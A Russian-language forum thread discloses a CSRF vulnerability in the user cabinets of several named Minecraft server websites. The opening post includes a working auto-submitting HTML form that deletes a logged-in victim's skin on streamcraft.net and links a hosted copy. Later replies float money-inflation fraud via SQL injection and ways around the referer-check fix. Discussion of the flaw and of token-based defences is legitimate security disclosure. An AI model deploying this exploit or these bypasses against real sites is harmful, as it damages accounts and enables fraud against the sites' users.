CSRF уязвимость на: Всех проектах McLab, MinecraftOnly, Еще много где

Не знаю зачем сейчас копался в streamcraft'е, наткнулся в их личном кабинете на типичную CSRF уязвимость (3 по популярности веб уязвимость в мире).
Начал смотреть дальше, заражены очень много проектов с горе-паблик-личными-клиентами.
streamcraft.net
oneland.su
frostland.pro
minecraftonly.ru
и т.д.

В кратце с помощью уязвимости можно делать любые вещи в личном кабинете если игрок перейдет по определенной ссылке с вредоносным скриптом на вашем конце.

Proof of concept - вот небольшой html код
<form method="POST" action="http://streamcraft.net/cabinet">
<input type="hidden" name="delskin" value="lol">
<input type="submit" id="doit" value="Hello">
</form>
<script>
document.getElementById("doit").click();
</script>
Размещенный на вашем сайте на вашей ссылке, если человек, авторизованный в лк стримкрафта перейдет по ссылке с таким кодом - его скин автоматически удалится.
Можете проверить сами - http://starcrack.hol.es/babon/csrf.html

 

Проверил, работает

 

Уго

 

"Хорошие" у них кодеры Бывает, что в некоторых магазинах можно вещи бесплатно покупать, а то и накручивать деньги на счёте.

 

Жаль на stteamcraft нельзя))

 

Такс, а можно ли сделать что бы деньги можно было накрутить? В лс

 

Sql инъекция например...

 

FIX

 

Закостылили проверкой referer...

 

Главное то, что теперь все это дело (Описанное выше) не работает.

Это уж точно не про нас.

 

Если так, то пихаем в ифрейм и продолжаем использовать дыру)

 

+

 

Мне кажется не надо было создавать эту тему (Пофиксят же)

 

Работает, просто нужно подделать referer. Для этого достаточно юзануть к примеру curl. Потому нужно юзать скрытый токен.

 

Самая гениальная идея!

 

@VareZzZz, а вы не пробовали использовать что-то нормальное в своих проектах, отличное костыляния вокруг DLE и вообще PHP?

 

А зачем? Деньги ведь и так идут

 

+

 

А что ты имеешь ввиду, когда говоришь "и вообще PHP"?